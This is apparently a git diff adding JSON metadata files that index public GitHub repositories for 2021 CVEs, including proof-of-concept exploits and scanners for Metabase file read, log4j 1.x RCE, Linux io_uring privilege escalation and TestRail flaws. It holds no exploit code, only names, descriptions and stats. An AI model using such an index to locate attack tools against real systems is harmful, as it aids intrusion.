+ "description": "Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code",
+ "fork": false,
+ "created_at": "2021-10-08T05:35:40Z",
+ "updated_at": "2023-12-11T05:31:49Z",
+ "pushed_at": "2022-04-15T06:06:50Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40870"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40875.json b/2021/CVE-2021-40875.json
new file mode 100644
index 0000000000..44a7e25741
--- /dev/null
+++ b/2021/CVE-2021-40875.json
@@ -0,0 +1,77 @@
+[
+ {
+ "id": 405876934,
+ "name": "derailed",
+ "full_name": "SakuraSamuraii\/derailed",
+ "owner": {
+ "login": "SakuraSamuraii",
+ "id": 90020213,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4",
+ "html_url": "https:\/\/github.com\/SakuraSamuraii"
+ },
+ "html_url": "https:\/\/github.com\/SakuraSamuraii\/derailed",
+ "description": "CVE-2021-40875: Tools to Inspect Gurock Testrail Servers for Vulnerabilities related to CVE-2021-40875.",
+ "fork": false,
+ "created_at": "2021-09-13T07:35:18Z",
+ "updated_at": "2022-10-22T06:31:23Z",
+ "pushed_at": "2021-09-22T13:24:31Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-40875",
+ "exploit",
+ "gurock",
+ "hacking",
+ "poc",
+ "proof-of-concept",
+ "sakurasamuraii",
+ "testrail",
+ "tools"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 463282170,
+ "name": "TestRail-files.md5-IAC-scanner",
+ "full_name": "Lul\/TestRail-files.md5-IAC-scanner",
+ "owner": {
+ "login": "Lul",
+ "id": 59487177,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59487177?v=4",
+ "html_url": "https:\/\/github.com\/Lul"
+ },
+ "html_url": "https:\/\/github.com\/Lul\/TestRail-files.md5-IAC-scanner",
+ "description": "Python scanner for TestRail servers vulnerable to CVE-2021-40875",
+ "fork": false,
+ "created_at": "2022-02-24T19:52:01Z",
+ "updated_at": "2022-02-25T01:56:15Z",
+ "pushed_at": "2022-02-28T14:53:40Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40875",
+ "python3",
+ "testrail"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40903.json b/2021/CVE-2021-40903.json
new file mode 100644
index 0000000000..4dd805865a
--- /dev/null
+++ b/2021/CVE-2021-40903.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 505059125,
+ "name": "CVE-2021-40903",
+ "full_name": "vulnz\/CVE-2021-40903",
+ "owner": {
+ "login": "vulnz",
+ "id": 20043135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20043135?v=4",
+ "html_url": "https:\/\/github.com\/vulnz"
+ },
+ "html_url": "https:\/\/github.com\/vulnz\/CVE-2021-40903",
+ "description": "CVE-2021-40903",
+ "fork": false,
+ "created_at": "2022-06-19T09:01:24Z",
+ "updated_at": "2024-02-13T19:02:23Z",
+ "pushed_at": "2022-06-19T09:04:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40904.json b/2021/CVE-2021-40904.json
new file mode 100644
index 0000000000..9468e7c492
--- /dev/null
+++ b/2021/CVE-2021-40904.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416272595,
+ "name": "CVE-2021-40904",
+ "full_name": "Edgarloyola\/CVE-2021-40904",
+ "owner": {
+ "login": "Edgarloyola",
+ "id": 43635073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4",
+ "html_url": "https:\/\/github.com\/Edgarloyola"
+ },
+ "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40904",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-12T09:38:48Z",
+ "updated_at": "2022-01-01T12:27:43Z",
+ "pushed_at": "2022-09-16T17:51:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40905.json b/2021/CVE-2021-40905.json
new file mode 100644
index 0000000000..770c5164c1
--- /dev/null
+++ b/2021/CVE-2021-40905.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416271934,
+ "name": "CVE-2021-40905",
+ "full_name": "Edgarloyola\/CVE-2021-40905",
+ "owner": {
+ "login": "Edgarloyola",
+ "id": 43635073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4",
+ "html_url": "https:\/\/github.com\/Edgarloyola"
+ },
+ "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40905",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-12T09:36:56Z",
+ "updated_at": "2022-01-01T12:23:21Z",
+ "pushed_at": "2022-09-16T17:59:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40906.json b/2021/CVE-2021-40906.json
new file mode 100644
index 0000000000..b402fc20e4
--- /dev/null
+++ b/2021/CVE-2021-40906.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416269763,
+ "name": "CVE-2021-40906",
+ "full_name": "Edgarloyola\/CVE-2021-40906",
+ "owner": {
+ "login": "Edgarloyola",
+ "id": 43635073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43635073?v=4",
+ "html_url": "https:\/\/github.com\/Edgarloyola"
+ },
+ "html_url": "https:\/\/github.com\/Edgarloyola\/CVE-2021-40906",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-12T09:30:38Z",
+ "updated_at": "2022-01-02T09:08:29Z",
+ "pushed_at": "2022-04-22T17:19:53Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40978.json b/2021/CVE-2021-40978.json
new file mode 100644
index 0000000000..cba6c24141
--- /dev/null
+++ b/2021/CVE-2021-40978.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 413241448,
+ "name": "CVE-2021-40978",
+ "full_name": "nisdn\/CVE-2021-40978",
+ "owner": {
+ "login": "nisdn",
+ "id": 15092748,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15092748?v=4",
+ "html_url": "https:\/\/github.com\/nisdn"
+ },
+ "html_url": "https:\/\/github.com\/nisdn\/CVE-2021-40978",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-04T01:36:17Z",
+ "updated_at": "2022-05-07T07:05:46Z",
+ "pushed_at": "2022-09-07T13:23:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4104.json b/2021/CVE-2021-4104.json
new file mode 100644
index 0000000000..55d50b7b39
--- /dev/null
+++ b/2021/CVE-2021-4104.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 438246567,
+ "name": "log4shell_1.x",
+ "full_name": "cckuailong\/log4shell_1.x",
+ "owner": {
+ "login": "cckuailong",
+ "id": 10824150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4",
+ "html_url": "https:\/\/github.com\/cckuailong"
+ },
+ "html_url": "https:\/\/github.com\/cckuailong\/log4shell_1.x",
+ "description": "log4j 1.x RCE Poc -- CVE-2021-4104",
+ "fork": false,
+ "created_at": "2021-12-14T12:35:08Z",
+ "updated_at": "2024-05-16T10:24:30Z",
+ "pushed_at": "2021-12-14T12:56:24Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 446349513,
+ "name": "log4j",
+ "full_name": "open-AIMS\/log4j",
+ "owner": {
+ "login": "open-AIMS",
+ "id": 68976138,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68976138?v=4",
+ "html_url": "https:\/\/github.com\/open-AIMS"
+ },
+ "html_url": "https:\/\/github.com\/open-AIMS\/log4j",
+ "description": "Log4j version 1.2.17 without the offending class responsible for CVE-2021-4104.",
+ "fork": false,
+ "created_at": "2022-01-10T09:01:46Z",
+ "updated_at": "2022-01-11T02:43:30Z",
+ "pushed_at": "2022-01-13T03:57:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41073.json b/2021/CVE-2021-41073.json
new file mode 100644
index 0000000000..df409aeab5
--- /dev/null
+++ b/2021/CVE-2021-41073.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 465436142,
+ "name": "Linux_LPE_io_uring_CVE-2021-41073",
+ "full_name": "chompie1337\/Linux_LPE_io_uring_CVE-2021-41073",
+ "owner": {
+ "login": "chompie1337",
+ "id": 56364411,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4",
+ "html_url": "https:\/\/github.com\/chompie1337"
+ },
+ "html_url": "https:\/\/github.com\/chompie1337\/Linux_LPE_io_uring_CVE-2021-41073",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-02T19:07:37Z",
+ "updated_at": "2024-05-10T10:44:35Z",
+ "pushed_at": "2022-03-08T15:37:34Z",
+ "stargazers_count": 97,
+ "watchers_count": 97,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 97,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41074.json b/2021/CVE-2021-41074.json
new file mode 100644
index 0000000000..5b386af0fa
--- /dev/null
+++ b/2021/CVE-2021-41074.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 406110856,
+ "name": "CVE-2021-41074",
+ "full_name": "dillonkirsch\/CVE-2021-41074",
+ "owner": {
+ "login": "dillonkirsch",
+ "id": 1911339,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1911339?v=4",
+ "html_url": "https:\/\/github.com\/dillonkirsch"
+ },
+ "html_url": "https:\/\/github.com\/dillonkirsch\/CVE-2021-41074",
+ "description": "CSRF in Qloapps HotelCommerce 1.5.1",
+ "fork": false,
+ "created_at": "2021-09-13T19:55:57Z",
+ "updated_at": "2024-05-13T23:08:53Z",
+ "pushed_at": "2021-09-19T08:50:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41078.json b/2021/CVE-2021-41078.json
new file mode 100644
index 0000000000..a94610d96c
--- /dev/null
+++ b/2021/CVE-2021-41078.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 529784417,
+ "name": "CVE-2021-41078",
+ "full_name": "s-index\/CVE-2021-41078",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2021-41078",
+ "description": "nameko Arbitrary code execution due to YAML deserialization",
+ "fork": false,
+ "created_at": "2022-08-28T06:42:59Z",
+ "updated_at": "2022-08-28T07:20:36Z",
+ "pushed_at": "2022-08-28T07:27:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "code-execution",
+ "cve-2021-41078",
+ "nameko",
+ "python",
+ "unsafe-yaml-load"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41081.json b/2021/CVE-2021-41081.json
new file mode 100644
index 0000000000..2ac6b57caf
--- /dev/null
+++ b/2021/CVE-2021-41081.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 435080918,
+ "name": "CVE-2021-41081",
+ "full_name": "sudaiv\/CVE-2021-41081",
+ "owner": {
+ "login": "sudaiv",
+ "id": 94256505,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94256505?v=4",
+ "html_url": "https:\/\/github.com\/sudaiv"
+ },
+ "html_url": "https:\/\/github.com\/sudaiv\/CVE-2021-41081",
+ "description": "N-DAY VULNERABILITY RESEARCH (FROM PATCH TO EXPLOIT ANALYSIS OF CVE-2021-41081)",
+ "fork": false,
+ "created_at": "2021-12-05T05:22:08Z",
+ "updated_at": "2021-12-05T19:02:21Z",
+ "pushed_at": "2021-12-05T19:02:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41091.json b/2021/CVE-2021-41091.json
new file mode 100644
index 0000000000..8efc1b2f5c
--- /dev/null
+++ b/2021/CVE-2021-41091.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 635201457,
+ "name": "CVE-2021-41091",
+ "full_name": "UncleJ4ck\/CVE-2021-41091",
+ "owner": {
+ "login": "UncleJ4ck",
+ "id": 52085661,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52085661?v=4",
+ "html_url": "https:\/\/github.com\/UncleJ4ck"
+ },
+ "html_url": "https:\/\/github.com\/UncleJ4ck\/CVE-2021-41091",
+ "description": "POC for CVE-2021-41091",
+ "fork": false,
+ "created_at": "2023-05-02T07:25:13Z",
+ "updated_at": "2024-05-21T12:36:35Z",
+ "pushed_at": "2023-05-20T09:16:34Z",
+ "stargazers_count": 63,
+ "watchers_count": 63,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 63,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 798589964,
+ "name": "CVE-2021-41091",
+ "full_name": "jrbH4CK\/CVE-2021-41091",
+ "owner": {
+ "login": "jrbH4CK",
+ "id": 163496398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163496398?v=4",
+ "html_url": "https:\/\/github.com\/jrbH4CK"
+ },
+ "html_url": "https:\/\/github.com\/jrbH4CK\/CVE-2021-41091",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-10T04:42:35Z",
+ "updated_at": "2024-05-10T04:48:04Z",
+ "pushed_at": "2024-05-10T04:48:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41117.json b/2021/CVE-2021-41117.json
new file mode 100644
index 0000000000..eb7b314b0a
--- /dev/null
+++ b/2021/CVE-2021-41117.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 492411370,
+ "name": "keypairvuln",
+ "full_name": "badkeys\/keypairvuln",
+ "owner": {
+ "login": "badkeys",
+ "id": 97682451,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97682451?v=4",
+ "html_url": "https:\/\/github.com\/badkeys"
+ },
+ "html_url": "https:\/\/github.com\/badkeys\/keypairvuln",
+ "description": "Private keys generated with vulnerable keypair versions (CVE-2021-41117)",
+ "fork": false,
+ "created_at": "2022-05-15T06:56:53Z",
+ "updated_at": "2022-05-31T10:57:21Z",
+ "pushed_at": "2023-10-12T14:27:08Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41160.json b/2021/CVE-2021-41160.json
new file mode 100644
index 0000000000..ac4d13afd8
--- /dev/null
+++ b/2021/CVE-2021-41160.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 582846037,
+ "name": "CVE-2021-41160",
+ "full_name": "Jajangjaman\/CVE-2021-41160",
+ "owner": {
+ "login": "Jajangjaman",
+ "id": 121527146,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121527146?v=4",
+ "html_url": "https:\/\/github.com\/Jajangjaman"
+ },
+ "html_url": "https:\/\/github.com\/Jajangjaman\/CVE-2021-41160",
+ "description": "FreeRDP is a free implementation of the Remote Desktop Protocol (RDP), released under the Apache license. In affected versions a malicious server might trigger out of bound writes in a connected client. Connections using GDI or SurfaceCommands to send graphics updates to the client might send `0` width\/height or out of CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2022-12-28T02:59:42Z",
+ "updated_at": "2023-02-20T12:17:31Z",
+ "pushed_at": "2022-12-27T22:27:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41184.json b/2021/CVE-2021-41184.json
new file mode 100644
index 0000000000..56dc51439d
--- /dev/null
+++ b/2021/CVE-2021-41184.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 481619824,
+ "name": "Exploit-Medium-CVE-2021-41184",
+ "full_name": "gabrielolivra\/Exploit-Medium-CVE-2021-41184",
+ "owner": {
+ "login": "gabrielolivra",
+ "id": 89982150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89982150?v=4",
+ "html_url": "https:\/\/github.com\/gabrielolivra"
+ },
+ "html_url": "https:\/\/github.com\/gabrielolivra\/Exploit-Medium-CVE-2021-41184",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-14T13:42:54Z",
+ "updated_at": "2024-04-11T20:02:38Z",
+ "pushed_at": "2022-08-30T16:02:36Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-41277.json b/2021/CVE-2021-41277.json
new file mode 100644
index 0000000000..66d113c8f3
--- /dev/null
+++ b/2021/CVE-2021-41277.json
@@ -0,0 +1,403 @@
+[
+ {
+ "id": 430342146,
+ "name": "CVE-2021-41277",
+ "full_name": "Seals6\/CVE-2021-41277",
+ "owner": {
+ "login": "Seals6",
+ "id": 49613759,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49613759?v=4",
+ "html_url": "https:\/\/github.com\/Seals6"
+ },
+ "html_url": "https:\/\/github.com\/Seals6\/CVE-2021-41277",
+ "description": "Metabase任意文件读取漏洞批量扫描工具",
+ "fork": false,
+ "created_at": "2021-11-21T11:04:44Z",
+ "updated_at": "2023-11-20T10:47:56Z",
+ "pushed_at": "2021-11-22T11:42:32Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41277"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430348963,
+ "name": "CVE-2021-41277",
+ "full_name": "tahtaciburak\/CVE-2021-41277",
+ "owner": {
+ "login": "tahtaciburak",
+ "id": 16239725,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16239725?v=4",
+ "html_url": "https:\/\/github.com\/tahtaciburak"
+ },
+ "html_url": "https:\/\/github.com\/tahtaciburak\/CVE-2021-41277",
+ "description": "PoC for CVE-2021-41277",
+ "fork": false,
+ "created_at": "2021-11-21T11:38:08Z",
+ "updated_at": "2023-09-28T11:33:25Z",
+ "pushed_at": "2021-11-25T21:10:41Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41277",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430542078,
+ "name": "Metabase-cve-2021-41277",
+ "full_name": "Henry4E36\/Metabase-cve-2021-41277",
+ "owner": {
+ "login": "Henry4E36",
+ "id": 41940481,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4",
+ "html_url": "https:\/\/github.com\/Henry4E36"
+ },
+ "html_url": "https:\/\/github.com\/Henry4E36\/Metabase-cve-2021-41277",
+ "description": " Metabase 任意文件读取",
+ "fork": false,
+ "created_at": "2021-11-22T02:51:49Z",
+ "updated_at": "2021-11-22T02:55:29Z",
+ "pushed_at": "2021-11-22T02:55:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430704302,
+ "name": "CVE-2021-41277",
+ "full_name": "kap1ush0n\/CVE-2021-41277",
+ "owner": {
+ "login": "kap1ush0n",
+ "id": 94843370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94843370?v=4",
+ "html_url": "https:\/\/github.com\/kap1ush0n"
+ },
+ "html_url": "https:\/\/github.com\/kap1ush0n\/CVE-2021-41277",
+ "description": "MetaBase 任意文件读取漏洞 fofa批量poc",
+ "fork": false,
+ "created_at": "2021-11-22T12:49:42Z",
+ "updated_at": "2021-11-22T12:50:17Z",
+ "pushed_at": "2021-11-22T12:50:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430814901,
+ "name": "CVE-2021-41277",
+ "full_name": "z3n70\/CVE-2021-41277",
+ "owner": {
+ "login": "z3n70",
+ "id": 39817707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4",
+ "html_url": "https:\/\/github.com\/z3n70"
+ },
+ "html_url": "https:\/\/github.com\/z3n70\/CVE-2021-41277",
+ "description": "simple program for exploit metabase",
+ "fork": false,
+ "created_at": "2021-11-22T18:06:11Z",
+ "updated_at": "2024-01-19T16:01:47Z",
+ "pushed_at": "2021-11-22T23:12:33Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "cybersecurity",
+ "exploit",
+ "metabase",
+ "ruby"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 430985632,
+ "name": "CVE-2021-41277",
+ "full_name": "kaizensecurity\/CVE-2021-41277",
+ "owner": {
+ "login": "kaizensecurity",
+ "id": 50189722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50189722?v=4",
+ "html_url": "https:\/\/github.com\/kaizensecurity"
+ },
+ "html_url": "https:\/\/github.com\/kaizensecurity\/CVE-2021-41277",
+ "description": "plugin made for LeakiX",
+ "fork": false,
+ "created_at": "2021-11-23T06:24:16Z",
+ "updated_at": "2021-11-24T19:49:07Z",
+ "pushed_at": "2021-11-24T19:49:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 431203570,
+ "name": "Metabase_CVE-2021-41277",
+ "full_name": "Vulnmachines\/Metabase_CVE-2021-41277",
+ "owner": {
+ "login": "Vulnmachines",
+ "id": 79006904,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4",
+ "html_url": "https:\/\/github.com\/Vulnmachines"
+ },
+ "html_url": "https:\/\/github.com\/Vulnmachines\/Metabase_CVE-2021-41277",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-23T18:01:23Z",
+ "updated_at": "2022-01-10T03:07:08Z",
+ "pushed_at": "2022-07-26T05:21:06Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 431364503,
+ "name": "CVE-2021-41277",
+ "full_name": "TheLastVvV\/CVE-2021-41277",
+ "owner": {
+ "login": "TheLastVvV",
+ "id": 71128830,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4",
+ "html_url": "https:\/\/github.com\/TheLastVvV"
+ },
+ "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-41277",
+ "description": "Metabase GeoJSON map local file inclusion",
+ "fork": false,
+ "created_at": "2021-11-24T05:56:46Z",
+ "updated_at": "2021-11-24T06:02:34Z",
+ "pushed_at": "2021-11-24T06:02:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 435423428,
+ "name": "CVE-2021-41277",
+ "full_name": "zer0yu\/CVE-2021-41277",
+ "owner": {
+ "login": "zer0yu",
+ "id": 16551733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16551733?v=4",
+ "html_url": "https:\/\/github.com\/zer0yu"
+ },
